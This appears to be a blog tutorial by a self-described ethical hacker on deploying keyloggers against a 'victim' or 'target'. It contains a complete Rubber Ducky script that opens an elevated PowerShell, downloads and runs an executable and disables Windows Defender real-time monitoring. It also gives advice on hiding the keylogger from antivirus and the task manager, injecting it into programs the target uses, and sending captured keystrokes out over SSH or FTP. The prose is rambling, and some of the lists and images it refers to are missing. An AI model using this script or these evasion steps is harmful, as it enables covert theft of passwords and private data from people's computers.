I am an ethical hacker who learned hacking from youtube. I like to help people with the learning of necessary skills.
A keylogger is a tool designed to record every keystroke on a system for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed by the target or typed in the affected computer such as users' passwords and other private information. Often hackers use viruses trojans and rootkits-like methods to remain active and hidden
The amount of info a keylogger can collect by keylogger software can vary by the software used and how complex it is. The most basic program can collect the info only typed by the target and collect it via email or application. More sophisticated keylogger software can collect:
In this article, we'll discuss:
You may need Python and C++ even some Arduino and ducky coding engines to run and execute the codes for the keyloggers.
Python keylogger uses python to be preinstalled in the victim's system and to have python installed or you may convert it into a binary to be installed in the system any way I am going to explain the dynamics but not how to code the entire thing as even I don't know how to do it don't judge me. well, I am going to suggest a few Udemy courses for that you can check them out if you want to learn how to build a keylogger.
If you have written and converted the script to a binary file and uploaded it to a Mediafire, you can download it via a code running in the background using a ducky script. Now, you can have the code and script in one single ducky script that it runs in the background of the system like if code it in such a way that the code uses the os function to do the background using of the tool.
Using this you can even stealth your operation by adding the hiding the programs in a location and hiding the folder using the hide function or header
Script download and execute the file from a website and disable defender using Powershell:
REM Windows 10: Poweshell administrator download and execute file REM Author: Judge2020 REM author website: Judge2020.com REM REM start of script REM REM let the HID enumerate DELAY 1000 GUI r DELAY 200 REM my best attempt at a elevated powershell instance STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1000 ALT y DELAY 200 STRING $down = New-Object System.Net.WebClient; $url = 'abc.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); DELAY 1000 GUI r DELAY 200 REM my best attempt at a elevated powershell instance STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1000 ALT y DELAY 200 STRING Set-MpPreference -DisableRealtimeMonitoring $true ENTER STRING exit ENTER exit;
The above image shows the complete map of how does the hid attack work in detail.
Using this code you can add an autorun feature for a file. There are softwares outside that automates the process but for the best result, you can opt for injecting the codes inside another program that you know the target often uses. This can be achieved by adding a new icon on the desktop replacing the already existing icon with it or you can install the autorun feature in the source code. You can even stealth the files by converting the files to binaries and changing the name to another name from the source code only. This way, you can hide this from the task manager and other uses and if you are smart enough you can code it in such a way that the antivirus software does not recognize it as a virus but as a legit application.
You can select the retrieval method and the way you want to extract the data from the target one of the few options is using ssh and FTP and I think ssh is the best because the name only suggests secured Shell. Its recommended to keep yourself safe to a certain extent from reverse engineering of the application but you can also use FTP to just transfer the files and folders to the Raspberry Pi set-up. To listen and capture the incoming data, this type of keylogger is really dangerous as your data can be transferred in just 1 or 2 hours if the attacker has good internet
You can imagine it as like this:
( target view )
( hackers view )
Data retrieved I can retrieve:
Rubberducky definitions directly copied from Hak5
Hacking is a risky job and you may end up behind bars for doing things such as hacking IT services and other things please do it responsibly by taking permission from the target before doing such a thing.
Follow my Twitter account for the latest updates
Create your free account to unlock your custom reading experience.